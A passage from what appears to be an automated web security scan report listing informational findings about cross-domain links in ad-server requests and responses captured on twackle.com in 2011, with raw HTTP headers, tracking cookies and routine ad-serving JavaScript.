Wem1BTDRCY0FDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREVnQWJGcmFqNmw0SDF2RFEmbnVtPTEmc2lnPUFHaVdxdHpnMUsweXMtZFpfdnRuT0J1QnlvTENSejhVTFEmY2xpZW50PWNhLXB1Yi03NDk0MTU2MDI3MDE4MzQyJmFkdXJsPQo-/clkurl=

The response contains the following links to other domains:

http://ad.doubleclick.net/adj/N6542.218.EXPEDIA/B5416978.4;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUzXWVqsh8fE2YVH3aWZfihV.YoS9nZW8sdXNhLHQsMTMwNzk2NjE3MjcxOCxjLDM0NjQ5MyxwYyw3NzcwNixhYywxNzA1OTUsbyxOMC1TMCxsLDYyMzk5LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVaSGo3YWdmVXEzTGdORlBsejNkT1A0QS43bXhuWlc4c2RYTmhMSFFzTVRNd056azJOakUzTVRReU5TeGpMRE0wTmpVd055eHdZeXc0TURneE5TeGhZeXd4Tnpjek5UZ3NieXhPTUMxVE1DeHNMRFkxTWpZNExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDFWeVoyVm9aWFJTTmtRNVUzVkNOa1kyTVVodlVIZEJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUVVkWlJUTmtZMHRaYUVoZllYbEVSMjkyUW1SNVgxa3RkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZEVFdOQldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVU1QldVSkJaMVZEUVZGUlFVRkJRVUV4VTBSRmMyZEJRVUZCUVM0dlkyNWtQU0V6UVZOdVNuZHFXR3RCVlZGcVQwVmFSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSnFjVkl5TWxCeU1WUmxNbGRDVFdwcGJGRm1aelE0VjFoRFpHWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlREUkNZMEZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFVm5RV0pHY21GcU5tdzBTREYyUkZFbWJuVnRQVEVtYzJsblBVRkhhVmR4ZEhwbk1Vc3dlWE10WkZwZmRuUnVUMEoxUW5sdlRFTlNlamhWVEZFbVkyeHBaVzUwUFdOaExYQjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlKbUZrZFhKc1BRby0vY2xrdXJsPQo-/clkurl=;ord=81347700?
http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=77706&c5=170595&c6=&cv=1.3&cj=1&rn=1875043472

Request

GET /ads/?t=i&f=j&p=4703&pl=a64d67a0&rnd=81183589948341250&clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUZHj7agfUq3LgNFPlz3dOP4A.7mxnZW8sdXNhLHQsMTMwNzk2NjE3MTQyNSxjLDM0NjUwNyxwYyw4MDgxNSxhYywxNzczNTgsbyxOMC1TMCxsLDY1MjY4LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL1VyZ2VoZXRSNkQ5U3VCNkY2MUhvUHdBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRQUdZRTNkY0tZaEhfYXlER292QmR5X1ktdlZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFDTWNBWUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQU5BWUJBZ1VDQVFRQUFBQUExU0RFc2dBQUFBQS4vY25kPSEzQVNuSndqWGtBVVFqT0VaR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJqcVIyMlByMVRlMldCTWppbFFmZzQ4V1hDZGZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTDRCY0FDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREVnQWJGcmFqNmw0SDF2RFEmbnVtPTEmc2lnPUFHaVdxdHpnMUsweXMtZFpfdnRuT0J1QnlvTENSejhVTFEmY2xpZW50PWNhLXB1Yi03NDk0MTU2MDI3MDE4MzQyJmFkdXJsPQo-/clkurl= HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307984167&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307966165620&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307966165257&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1510796261&ga_fc=1&u_tz=-300&u_his=13&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=1770&xpc=V8625tKlN9&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAU2m.0eqiqClJN.7y5_PGFGq3y6NcDA3gBY2Bg4GJg2nKOgdWzm4HRej0Dw78vDAwMnAwMjAYdt18qMjBN_83A6raUgVFvCwPDpz9wuUttUxiYtvsB9YUwMFrtAeoD6oHqu1R3lYFpYigDq60IA6PWUwaG9_fgcvtPZTIw7bvLwGo3n4HR_ggDI1MIQu7IPdz6dr3ErW_rL6A7fwDduQLoztVAd36Gm7nrJyfQne5AdyYzMJoD7fplhpB79oqBKeMRA8vTXwyMaqsYGO7lw.RkbqguB7KZcOrdrcWL087dqrpAvQy.X4MZGLgZGOQrGWUYGRhYNjCKAikGA0YGVgaG9KlgQcUTjNxAwYUHGBmA1PKlYCXrPMCU1BJGfqDgonNguWX1jIJAHjRaQOYzAAAMoGPZ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUwLzc19M0qiczmleYOYA4OWw6DfADA3gBY2Bg4GZgmpXMwOpZy8Co38XA8Hk_AwMDJwMDo0HH7Xe6DExbzgHluhkYrdczMPz7gpB7qcjANP03A6vbUgZGvS0MDJ_.wOUutU1hYNruB9QXwsBotQeoD2ge1MxLdVcZmCaGMrDaijAwaj1lYHh_Dy63_1QmA9O.uwysdvMZGO2PMDAyhSDkjtzDrW_XS9z6tv4CuvMH0J0rgO5cDXTnZ7iZu35yAt3pDnRnMgOjOdCuX2YIuWevGJgyHjGwPP3FwKi2ioHhXj5MTuaG6nIgmwmn3t1avDjt3K2qC9TL4Ps1GBTyDPKVjDKMDAwsGxhFgRSDASMDKwND.lSwoOIJRm6g4MIDjAxAavlSsJJ1HmBKagkjP1Bw0Tmw3LJ6RkEgDxplIPMZAFbgatk-; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:56:12 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2137
Date: Mon, 13 Jun 2011 11:56:12 GMT

_346493_amg_acamp_id=170595;
_346493_amg_pcamp_id=77706;
_346493_amg_location_id=62399;
_346493_amg_creative_id=346493;
_346493_amg_loaded=true;
var _amg_346493_content='<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6542.218.EXPEDIA/B5416978.4;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUzXWVqsh8fE2YVH3aWZfihV.YoS9nZW8sdXNhLHQsMTMwNzk2NjE3MjcxOCxjLDM0NjQ5MyxwYyw3NzcwNixhYywxNzA1OTUsbyxOMC1TMCxsLDYyMzk5LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVaSGo3YWdmVXEzTGdORlBsejNkT1A0QS43bXhuWlc4c2RYTmhMSFFzTVRNd056azJOakUzTVRReU5TeGpMRE0wTmpVd055eHdZeXc0TURneE5TeGhZeXd4Tnpjek5UZ3NieXhPTUMxVE1DeHNMRFkxTWpZNExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDFWeVoyVm9aWFJTTmtRNVUzVkNOa1kyTVVodlVIZEJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSUVVkWlJUTmtZMHRaYUVoZllYbEVSMjkyUW1SNVgxa3RkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZEVFdOQldVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVU1QldVSkJaMVZEUVZGUlFVRkJRVUV4VTBSRmMyZEJRVUZCUVM0dlkyNWtQU0V6UVZOdVNuZHFXR3RCVlZGcVQwVmFSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSnFjVkl5TWxCeU1WUmxNbGRDVFdwcGJGRm1aelE0VjFoRFpHWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlREUkNZMEZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFVm5RV0pHY21GcU5tdzBTREYyUkZFbWJuVnRQVEVtYzJsblBVRkhhVmR4ZEhwbk1Vc3dlWE10WkZwZmRuUnVUMEoxUW5sdlRFTlNlamhWVEZFbVkyeHBaVzUwUFdOaExYQjFZaTAzTkRrME1UVTJNREkzTURFNE16UXlKbUZrZFhKc1BRby0vY2xrdXJsPQo-/clkurl=;ord=81347700?">\n'+
'</SCRIPT><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=77706&c5=170595&c6=&cv=1.3&cj=1&rn=1875043472" style="display:none" width="0" height="0" alt="" />';
document.writeln(_amg_346493_content);

18.5. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=5112&pl=d11d969d&rnd=37272224435582760&clkurl=http://ib.adnxs.com/click/AAAAAAAAAEAAAAAAAAAAQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQMbCAQVosTYM_ayDGovBdy-i8_VNAAAAAIwuAAC1AAAAlgIAAAIAAABI1QYA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gA1xABAgUCAQQAAAAAOBrGRgAAAAA./cnd=!7QRzKAi5uAUQyKobGNHHASAA/referrer=http%3A%2F%2Fwww.twackle.com%2Fheadlines/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBmcz2ovP1TYmNLIvtlQfn77z2Cdfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALQD8ACBMgChdLPCqgDAegDiALoA7UI9QMAAADEgAaKnKHz3tiP7BA%26num%3D1%26sig%3DAGiWqtzdPTl7nHPOyy0L0zrT-TotQBtEWw%26client%3Dca-pub-7494156027018342%26adurl%3D

The response contains the following link to another domain:

http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=81860&c5=179933&c6=&cv=1.3&cj=1&rn=1755990197

Request

GET /ads/?t=i&f=j&p=5112&pl=d11d969d&rnd=37272224435582760&clkurl=http://ib.adnxs.com/click/AAAAAAAAAEAAAAAAAAAAQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQMbCAQVosTYM_ayDGovBdy-i8_VNAAAAAIwuAAC1AAAAlgIAAAIAAABI1QYA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gA1xABAgUCAQQAAAAAOBrGRgAAAAA./cnd=!7QRzKAi5uAUQyKobGNHHASAA/referrer=http%3A%2F%2Fwww.twackle.com%2Fheadlines/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBmcz2ovP1TYmNLIvtlQfn77z2Cdfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALQD8ACBMgChdLPCqgDAegDiALoA7UI9QMAAADEgAaKnKHz3tiP7BA%26num%3D1%26sig%3DAGiWqtzdPTl7nHPOyy0L0zrT-TotQBtEWw%26client%3Dca-pub-7494156027018342%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982322&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964318938&bpp=3&shv=r20110608&jsv=r20110607&prev_slotnames=0457253054%2C0180034002&correlator=1307964318556&frm=4&adk=4288629557&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=1852423368&ga_fc=1&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1049&bih=926&eid=33895143&ref=http%3A%2F%2Fwww.twackle.com%2Fheadlines&fu=0&ifi=3&dtd=3167&xpc=Xq1icALNsj&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUN1PteUmIcdkK93wzi.ombmrBQnsDA3gBY2BgYGVgmhjKwGorwsCo9ZSB4f09BgYGTgYGRoOO_bteMjDtu8vAajefgdH.CAMjUwhCbusvBqbpPxhY3VYwMOqtZmD49Bkut.snJwPTdncGVs9kBkZzoJ5fZgi5Z68YmDIeMbA8_cXAqLaKgeFePkxO5obqciCbCafe3Vq8OO3craoL1Mvg.zWYgYGbgUG.klGGkYGBZQOjKJBiMGAEGsuQPhUsqHiCkRsouPAAIwOQWr4UrGSdB5iSWsLIDxRcdA4st6yeURDIAwfFK5DxDAwAUM5AEQ--

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUtHHXxqWMCUcAG4DqiiiGcYlETVEDA3gBY2BgYGNg2neXgdVuPgOj_REGRqYQBgYGTgYGRoOO_UfuMTBNDGVgtRVhYNR6ysDw_h5CbtdL3Pq2_mJgmv6DgdVtBQOj3moGhk.f4fp2_eRkYNruzsDqmczAaA6065cZQu7ZKwamjEcMLE9_MTCqrWJguJcPk5O5obocyGbCqXe3Fi9OO3er6gL1Mvh.DWZg4GZgkK9klGFkYGDZwCgKpBgMGBmYGRjSp4IFFU8wcgMFFx5gZABSy5eClazzAFNSSxj5gYKLzoHlltUzCgJ54GC6DzKegQEA5OJHDw--; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:25:27 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 1924
Date: Mon, 13 Jun 2011 11:25:26 GMT

_343711_amg_acamp_id=179933;
_343711_amg_pcamp_id=81860;
_343711_amg_location_id=66132;
_343711_amg_creative_id=343711;
_343711_amg_loaded=true;
var _amg_343711_content='<script language="Javascript">
...[SNIP]...
</noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=81860&c5=179933&c6=&cv=1.3&cj=1&rn=1755990197" style="display:none" width="0" height="0" alt="" />';
document.writeln(_amg_343711_content);

18.6. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=5112&pl=bb7d104a&rnd=91083618276752530&clkurl=http://ib.adnxs.com/click/AAAAAAAAAEAAAAAAAAAAQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQOT9OVwPZpkL_ayDGovBdy9k8vVNAAAAAIwuAAC1AAAAlgIAAAIAAABI9AUA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gAVwwBAgUCAQQAAAAAORo2aAAAAAA./cnd=!bwXLLQjc3gQQyOgXGNHHASAA/referrer=http%3A%2F%2Fwww.twackle.com%2Fheadlines/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBbxFBY_L1TdzJOMz8lQfJmaHxCNfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALQD8ACBMgChdLPCqgDAegDiALoA7UI9QMAAADAgAaGpqaby8Tdx_EB%26num%3D1%26sig%3DAGiWqtzcCewhlJyOrX67IKiuPDRQp5MYXg%26client%3Dca-pub-7494156027018342%26adurl%3D

The response contains the following links to other domains:

http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=79700&c5=177991&c6=&cv=1.3&cj=1&rn=520827844
http://servedby.adxpose.com/adxpose/find_ad.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUabUl55ctWfbz4_8QgoT4EM3BowwDA3gBY2BgYGJg2u7OwOqZzMBoHsLA8MuMgYGBk4GB0aBj17NXDEwZjxhYnv5iYFRbxcBwLx8mJ3NDdTmQDQa.X4MZGLgYGOQrGWUYGRhYNjCKAikGA0YGIJU.FSyoeIKRG8hbvhQst84DTEktYeQHCi46B1a5rJ5REMgD2_saYjIANIEckg--; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:20:08 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/javascript;charset=UTF-8
Content-Length: 2358
Date: Mon, 13 Jun 2011 11:20:08 GMT

_346467_amg_acamp_id=177991;
_346467_amg_pcamp_id=79700;
_346467_amg_location_id=64054;
_346467_amg_creative_id=346467;
_346467_amg_loaded=true;
var _amg_346467_content='<script type="text/javascript"
...[SNIP]...
</script>\n'+
'<script src="http://servedby.adxpose.com/adxpose/find_ad.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script><img src="http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=79700&c5=177991&c6=&cv=1.3&cj=1&rn=520827844" style="display:none" width="0" height="0" alt="" />';
document.writeln(_amg_346467_content);

18.7. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The page was loaded from a URL containing a query string:

http://ad.amgdgt.com/ads/?t=i&f=j&p=4703&pl=fa517122&rnd=8714839140884578&clkurl=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUcuadQ85tMEqC.MX6eqV157cQvJJnZW8sdXNhLHQsMTMwNzk2NDAwODE3MSxjLDM0NjQ2NyxwYyw3OTcwMCxhYywxNzc5OTEsbyxOMC1TMCxsLDY0MDU0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBQUVBQUFBQUFBQUFBUUFBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRT1Q5T1Z3UFpwa0xfYXlER292QmR5OWs4dlZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCSTlBVUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQVZ3d0JBZ1VDQVFRQUFBQUFPUm8yYUFBQUFBQS4vY25kPSFid1hMTFFqYzNnUVF5T2dYR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJieEZCWV9MMVRkekpPTXo4bFFmSm1hSHhDTmZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTFFEOEFDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREFnQWFHcHFhYnk4VGR4X0VCJm51bT0xJnNpZz1BR2lXcXR6Y0Nld2hsSnlPclg2N0lLaXVQRFJRcDVNWVhnJmNsaWVudD1jYS1wdWItNzQ5NDE1NjAyNzAxODM0MiZhZHVybD0K/clkurl=

The response contains the following links to other domains:

http://ad.doubleclick.net/adj/N6090.278943.EXPEDIAMEDIASOLUTIO/B5435952.11;sz=728x90;click=http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUFng8aJLBZKJyWoaUyNqjOVxerAdnZW8sdXNhLHQsMTMwNzk2NDAxMjgxMCxjLDM0NTc2OCxwYyw3NzQ4MyxhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk1LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVjdWFkUTg1dE1FcUMuTVg2ZXFWMTU3Y1F2SkpuWlc4c2RYTmhMSFFzTVRNd056azJOREF3T0RFM01TeGpMRE0wTmpRMk55eHdZeXczT1Rjd01DeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVDFRNVQxWjNVRnB3YTB4ZllYbEVSMjkyUW1SNU9XczRkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RsQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZaM2QwSkJaMVZEUVZGUlFVRkJRVUZQVW04eVlVRkJRVUZCUVM0dlkyNWtQU0ZpZDFoTVRGRnFZek5uVVZGNVQyZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmllRVpDV1Y5TU1WUmtla3BQVFhvNGJGRm1TbTFoU0hoRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNlkwTmxkMmhzU25sUGNsZzJOMGxMYVhWUVJGSlJjRFZOV1ZobkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=;ord=1314067228?
http://b.scorecardresearch.com/p?c1=8&c2=6035179&c3=1&c4=77483&c5=169976&c6=&cv=1.3&cj=1&rn=161104420

Request

